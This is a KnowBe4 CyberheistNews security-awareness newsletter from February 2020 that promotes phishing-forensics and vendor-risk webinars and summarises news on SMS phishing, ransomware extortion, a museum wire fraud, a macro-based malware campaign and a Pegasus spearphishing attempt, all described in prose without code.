CyberheistNews Vol 10 #7 Now You Can Learn How to Forensically Examine Phishing Emails and Better Protect Your Organization



 

CyberheistNews Vol 10 #07
Now You Can Learn How to Forensically Examine Phishing Emails and Better Protect Your Organization

I have a brand-new webinar for you! You told us that you wanted to learn a lot more about how to forensically examine phishing emails and better protect your organization. Well, I asked our resident data-driven defense expert Roger Grimes to create a special webinar for you. It's tomorrow, good for CPE credits, and warmly recommended. Save your spot, register right away. :-D
[NEW FORENSICS WEBINAR] Cyber CSI: Learn How to Forensically Examine Phishing Emails to Better Protect Your Organization Today

Cybercrime has become an arms race where the bad guys constantly evolve their attacks while you, the vigilant defender, must diligently expand your know-how to prevent intrusions into your network. Staying a step ahead may even involve becoming your own cybercrime investigator, forensically examining actual phishing emails to determine the who, the where, and the how.

In this webinar, Roger Grimes, KnowBe4’s Data-Driven Defense Evangelist, will show you how to become a digital private investigator! You’ll learn:
  • How to forensically examine phishing emails and identify other types of social engineering
  • What forensic tools and techniques you can use right now
  • How to investigate rogue smishing, vishing, and social media phishes
  • How to enable your users to spot suspicious emails sent to your organization
Get inside the mind of the hacker, learn their techniques, and how to spot phishing attempts before it’s too late!

Date/Time: TOMORROW, Wednesday, February 12 @ 2:00 PM (ET)

Save My Spot!
https://event.on24.com/wcc/r/2188071/C4F6438C4D77D0555EFC52EC16F0F281?partnerref=CHN2
Another SMS Scam

A new PayPal SMS phishing campaign is making the rounds, according to Paul Ducklin at Naked Security. The text messages in this campaign purports to come from PayPal and inform recipients that there’s been unusual activity detected on their PayPal accounts.

If a user clicks on the link provided in the message, they’ll be taken to a legitimate-looking phishing site that spoofs PayPal’s login process. After providing their email address and password (which are sent to the attackers), users are asked to enter their mother’s maiden name, their home address, and finally their credit card and bank details.

After this, the site will redirect the user to PayPal’s real homepage in order to remove any suspicion.

An interesting aspect of this particular campaign is that the phishing site will remember victims’ IP addresses. If a victim tries to revisit the site to investigate it further, they’ll immediately be redirected to PayPal’s homepage.

PayPal phishing campaigns via email are extremely common, but Ducklin explains that SMS phishing gives the attackers several advantages. Continued at the KnowBe4 blog:
https://blog.knowbe4.com/another-sms-scam?
[Live Demo] Identify and Respond to Email Threats Faster With PhishER

Your users are likely already reporting potentially dangerous emails in some fashion within your organization. The increase of this email traffic can present a new problem!

With only approximately 1 in 10 user-reported emails being verified as actually malicious, how do you handle the real phishing attacks and email threats —and just as importantly— effectively manage the other 90% of user-reported messages accurately and efficiently?

Now you can with PhishER, a product which allows your Incident Response team to quickly identify and respond to email threats faster. This will save them so much time!

See how you can best manage your user-reported messages.

Join us Wednesday, February 19 @ 2:00 pm (ET) for a live 30-minute demonstration of the PhishER platform. With PhishER you can:
  • Cut through your Incident Response inbox noise and respond to the most dangerous threats more quickly
  • Automate message prioritization by rules you set into one of three categories: Clean, Spam or Threat
  • Augment your analysis and prioritization of user-reported messages with PhishML, PhishER’s new machine-learning module
  • See clusters of messages to identify a potential phishing attack against your organization
  • Meet critical SLAs within your organization to process and prioritize threats and legitimate emails
  • Easy integration with KnowBe4’s email add-in button, Phish Alert, or forwarding to a mailbox works too!
Find out how adding PhishER can be a huge time-saver for your Incident Response team!

Date/Time: Wednesday, February 19 @ 2:00 (ET)

Save My Spot!
https://event.on24.com/wcc/r/2167033/52E3D8167FAC5AAA424813F51567BE64?partnerref=CHN1
Six Security Questions You Should Keep in Mind for Third Parties

Organizations are beginning to understand the consequences of a data breach or a phishing attack and the negative impact they can really have. But what are the security risks for third parties? There are always organizations that have access to (part of) the company data -- from accounting firms to health benefits organizations, among many others.

Perhaps it concerns data from employees, customers or patients; but in some cases, strategic organizational information may also be held by a third party.

More Third Parties Mean More Data Breaches

Research from the Ponemon Institute and Opus (a company focused on compliance solutions) among more than a thousand IT professionals from the United States and the United Kingdom shows that 61 percent of the companies in 2018 experienced a data breach through a third party. In 2016 that was 49 percent. The percentage is going up. According to the researchers, this is due to the popularity of outsourcing IT services and the huge increase in the number of third parties that organizations have to deal with.

Working with third parties could open up more opportunities for greater risks like data breaches. That’s why it’s so important for organizations to ask the right questions and to enforce stringent security policies before they agree to work with any third party.

Top Six Questions to Ask

For organizations that do not need an official and may not (yet) have the means to perform extensive audits of third parties, the following six questions should be asked:
  • Does this party need access to our systems?
  • What data do we share with this party?
  • Where is the data stored by them, and for how long?
  • Which third parties do they work with?
  • What measures do they take to secure the data?
  • What kind of proof can they provide that the data is safe with them?
Continued at the KnowBe4 blog:
https://blog.knowbe4.com/six-security-questions-you-should-keep-in-mind-for-third-parties
[NEW WEBINAR] Addressing the Challenge of Third-Party Vendor Risk: Securing Your Supply Chain

Your customer data, intellectual property, and financials are the lifeblood of your organization. If lost or leaked, there could be significant implications to the viability of your business. Maintaining control of that data, especially with third-party services, can be extremely challenging and requires that you ask the right questions and enforce stringent security policies.

In an environment of increased outsourcing, cloud computing adoption, and regulatory requirements, how do you manage vendor risk and ensure you have a consistent evaluation life cycle?

Join James McQuiggan, KnowBe4’s Security Awareness Advocate, to get actionable steps you can use now to better manage your third-party vendor risk.

You’ll learn:
  • The importance of securing your organization’s critical data
  • How to determine Supplier Security Proficiency
  • Why it’s important to understand the source of third-party products
  • The impact Vendor Questionnaires have on your Security Posture
  • How leveraging a GRC platform can ease the burden of risk assessments and audits
Date/Time: Wednesday, February 26 @ 2 PM (ET)

Save My Spot!
https://event.on24.com/wcc/r/2192176/49E09B861DCD3102086DEF0A259623F2?partnerref=CHN1
Heads-Up..."Ransomware 2.0" Is Here Now: Extremely Damaging, Dangerous and Disrupting

“Ransomware 2.0” requires defense in four main areas: prevention, detection, response and communications

In the last 3 months, ransomware has become a dramatically higher threat to organizations. Previously, ransomware would lock up your organization’s data and demand a ransom. In this new era--that KnowBe4 dubbed “Ransomware 2.0”--cyber criminals have quite suddenly become much more brazen and now infect networks to a point they won’t be saved by backups anymore.

The new normal for ransomware criminals is to exfiltrate your organization’s crown jewel data, steal all login credentials for employees and customers and any other highly confidential information like valuable intellectual property, and then use high-pressure extortion tactics like threatening to release the stolen data to the victim’s business partners, competitors and the general public.

“With ransomware, cyber criminals are seeking to inflict the most amount of pain and risk immediately,” said Roger Grimes, data-driven defense evangelist, KnowBe4. “They want to get paid and will do almost anything it takes to make that happen.

A new pattern has emerged late last year, where a single ransomware gang started to deploy new tactics to steal, encrypt and threaten employees and customers. It proved so successful that other ransomware gangs have now started using these same tactics, precipitating us into a new era of ‘Ransomware 2.0’.”

Watch the Webinar on Demand {no registration required}

For more “Ransomware 2.0” technical details, tactics and how to protect against them, watch the new, highly popular webinar by Roger Grimes titled: “Now That Ransomware Has Gone Nuclear, How Can You Avoid Becoming the Next Victim?” here.
https://www.knowbe4.com/nuclear-ransomware (no registration required)

Discuss This With Your Peers

KnowBe4's HackBusters Discussion Forum has a new topic called "Ransomware 2.0": No Choice But to Pay The Ransom? where you can kick around this problem with your peers and brainstorm how you defend against it:
https://discuss.hackbusters.com/t/ransomware-2-0-no-choice-but-to-pay-the-ransom/4809

Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc


P.S. Entrepreneur published my article: "My Employees Helped Me Build a Billion-Dollar Tech Company" https://www.entrepreneur.com/article/345775
Quotes of the Week
"Listening is a positive act: you have to put yourself out to do it."
- David Hockney, Artist (born 1937)

"Appreciation is a wonderful thing: It makes what is excellent in others belong to us as well."
- Voltaire, Philosopher (1694 - 1778)



Thanks for reading CyberheistNews

Security News
Scammers Conned a Dutch Museum Into Sending Them £2.4 Million

Scammers conned a Dutch museum into sending them £2.4 million (about $3.1 million) by posing as a real London-based art dealer who planned to sell the museum a John Constable painting, Artnet reports.

The Rijksmuseum Twenthe in the eastern Netherlands was interested in purchasing Constable’s “A View of Hampstead Heath: Child’s Hill, Harrow in the Distance.” The museum had been negotiating for months via email with then well-known art dealer Simon C. Dickinson when the conversation was hijacked by fraudsters.

The scammers then managed to convince the museum to wire the payment to a bank account in Hong Kong.

It’s not clear if the scammers hacked either party’s email accounts, and the museum and Dickinson both maintain that the other is at fault. The Rijksmuseum Twenthe tried to sue Dickinson for negligence, claiming his team knew about the fraudulent emails and didn’t warn the museum, but the lawsuit was thrown out of court. Dickinson’s lawyer told the court that the museum failed to verify that the bank account was legitimate before sending the money.

“Instead of accepting the reality of the situation, the museum has reacted by pursuing a series of hopeless claims against [Dickinson], in the hope of pinning the blame for the museum’s mistake on [the dealer],” the lawyer said.

At the moment, the museum has the painting in its possession and won’t give it back, even though Dickinson hasn’t been paid. A judge in London will decide who has rightful ownership of the artwork.

Dickinson’s managing director Emma Ward told Artnet that regardless of which side is to blame, both parties are victims of the scammers. “This unfortunate event highlights the dangers of cybercrime in the art world, which is regrettable for both the museum and Dickinson, especially when both are victims in this instance,” Ward said.

People in every field are at risk of falling victim to social engineering attacks. New-school security awareness training can enable your employees to be wary of these tricks. Artnet News has the story: https://news.artnet.com/art-world/rijksmuseum-twenthe-simon-dickinson-1765983
Unusual New Botnet-driven Phishing Attack With Tricky Downloaders

A large phishing campaign is distributing malicious Excel documents and utilizing irritating pop-ups to trick users into enabling macros, researchers at Lastline have found. The campaign is primarily focused on the Asia-Pacific region, and it’s using both generic spam emails and spearphishing to reach its targets.

The malicious macros act as downloaders for more advanced information-stealing malware, including Agent Tesla and LokiBot. One interesting aspect of the campaign is how the documents try to compel people to run the malicious macros.

When the user clicks on the document, it will be opened in Microsoft Excel. As soon as it’s opened, the document will repeatedly launch pop-up windows asking the user if they want to enable macros. The attackers achieve this by embedding multiple Excel sheets in the document and using a Rich Text Format (RTF) control word to update each one before displaying it. This makes the document launch a new pop-up for each embedded sheet.

The pop-ups will eventually cease if the user clicks “Deactivate macros” on each one, but the technique is much more persuasive than relying on a single request to allow macros.

Another notable feature of this campaign is its use of PowerShell’s Add-Type cmdlet to compile C# code and run it within the PowerShell environment. The C# code uses a common method to bypass the Windows Antimalware Scan Interface (AMSI), then downloads and executes the primary piece of malware. The Lastline researchers say the Add-Type trick allows them to avoid detection by security tools that are looking for malicious PowerShell commands.

“As discussed earlier, this technique provided the attackers with great flexibility to bypass AMSI-related detection and carry out further malicious downloads,” the researchers write. “Given its effectiveness, we expect this technique to become more popular in weaponized PowerShell payloads.”

While the attackers are increasing their malware’s ability to remain undetected by technology, the entire attack can be averted if the user knows to avoid enabling macros at all costs. New-school security awareness training helps your employees to thwart the social engineering aspects of these attacks. Lastline has the story:
https://www.lastline.com/labsblog/infostealers-self-compiling-droppers-set-loose-unusual-spam-campaign/
Intelligence Services Get Phishing Licenses

New York Times journalist Ben Hubbard was targeted by a spearphishing attack designed to deliver NSO Group’s Pegasus spyware, researchers at the University of Toronto’s Citizen Lab have concluded.

In 2018, Hubbard received an SMS message on his iPhone containing Arabic text that translated to “Ben Hubbard and the story of the Saudi Royal Family.” The message was accompanied by a link to arabnews365[.]com, which has since been tied to a Pegasus user associated with the Saudi Arabia’s government.

Hubbard was suspicious as soon as he saw this message, so he didn’t click the link. Instead, he searched the Internet for “Ben Hubbard and the story of the Saudi Royal Family,” and didn’t find any results. He also contacted Arab News, a real Saudi Arabian newspaper, which confirmed that arabnews365[.]com wasn’t one of their domains.

Hubbard eventually turned the message over to the researchers at Citizen Lab, who determined that the domain was connected to the Saudi-linked Pegasus operator. If Hubbard had clicked the link, the Pegasus operator would have gained full access to his device.

The Citizen Lab researchers provide some interesting insights into why Hubbard was able to avoid falling for the attack.

“Academic research on journalist security shows that journalists do not share the same digital security practices and perceptions across the profession,” they write. “For example, a study found that a common mindset for journalists is to only prioritize digital security if they perceive the stories they are working on as sensitive enough to attract the attention of government authorities.

Echoing these findings, ongoing research by the Citizen Lab finds that investigative reporters tend to take digital security more seriously than their peers who work on non-investigative beats, and have higher familiarity with digital security tools and practices.”

The researchers note that this type of familiarity with security practices doesn’t always come naturally, even when people work in situations where they should be wary of social engineering attacks.

“As an investigative reporter covering a sensitive topic, Ben Hubbard was wary of suspicious messages and chose to share the one he received with us for analysis,” they continue. “Yet, not all targeted journalists are working on a topic where the risk of surveillance may be so obvious.

Some studies show that differences in education and training, alongside other variables such as financial incentives and institutional culture, may play a key role in closing or compounding gaps in digital security practices.”

New-school security awareness training can create a culture of security within your organization by teaching your employees to approach everything they do with a security-focused mindset. Citizen Lab has the story:
https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/
What KnowBe4 Customers Say

"Dear Stu, I just wanted to drop a line to mention how sterling-good Dedric Roberts was to work with last week. He reviewed my settings in Exchange and helped me set my environment up so that phish testing is working without a hitch.

Dedric also helped me set up rules so we could receive attachments in the testing -- something that had been eluding me for years now (used KnowBe4 in last job too).

This excellent technical support reconfirms how lucky we are to be using the KnowBe4 platform as part of our IS Program. Thank you from one happy customer!" - I.L., Information Security Engineer
The 10 Interesting News Items This Week
    1. Interview with the author of: "The Spy in Moscow Station: A Counterspy's Hunt for a Deadly Cold War Threat":
      https://www.thecyberwire.com/podcasts/cw-podcasts-special-2020-Eric-Haseltine-on-his-book-The-Spy-in-Moscow-Station.html

    2. Dangerous Domain Corp.com Goes Up for Sale:
      https://krebsonsecurity.com/2020/02/dangerous-domain-corp-com-goes-up-for-sale/

    3. New Ransomware Strain Hijacks A Vulnerable Windows Driver To Turn Off Your Antivirus And Infect The Network:
      https://blog.knowbe4.com/heads-up-new-ransomware-strain-hijacks-a-vulnerable-windows-driver-to-turn-off-your-antivirus-and-infect-the-network

    4. Five Security Warnings For 2020, by yours truly at Forbes:
      https://www.forbes.com/sites/forbestechcouncil/2020/02/04/five-security-warnings-for-2020/#78c1d9086b51

    5. State-sponsored Social Engineering: How You Can Protect Your Business From Iranian Cyber Threats:
      https://www.riskiq.com/blog/external-threat-management/how-you-can-protect-your-business-from-iranian-cyber-threats/

    6. The CIA’s Infamous, Unsolved Cryptographic Puzzle Gets a ‘Final Clue’:
      https://www.vice.com/en_us/article/3a8k93/the-cias-infamous-unsolved-cryptographic-puzzle-gets-a-final-clue

    7. Bitbucket Abused to Infect 500,000+ Hosts with Malware Cocktail:
      https://www.bleepingcomputer.com/news/security/bitbucket-abused-to-infect-500-000-hosts-with-malware-cocktail/

    8. The Top 11 Cyber Security books:
      https://www.thesslstore.com/blog/the-best-cyber-security-books/

    9. Here’s why NSA rushed to expose a dangerous computer bug:
      https://www.washingtonpost.com/news/powerpost/paloma/the-cybersecurity-202/2020/02/06/the-cybersecurity-202-here-s-why-nsa-rushed-to-expose-a-dangerous-computer-bug/5e3b0f41602ff15f8279a52e/

    10. Disinformation 2020: FBI warns of ongoing Russian 'information warfare':
      https://boingboing.net/2020/02/05/disinformation-2020-fbi-warns.html
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff

FOLLOW US ON: Twitter | LinkedIn | YouTube
Copyright © 2014-2020 KnowBe4, Inc. All rights reserved.



Subscribe to Our Blog


Comprehensive Anti-Phishing Guide




Get the latest about social engineering

Subscribe to CyberheistNews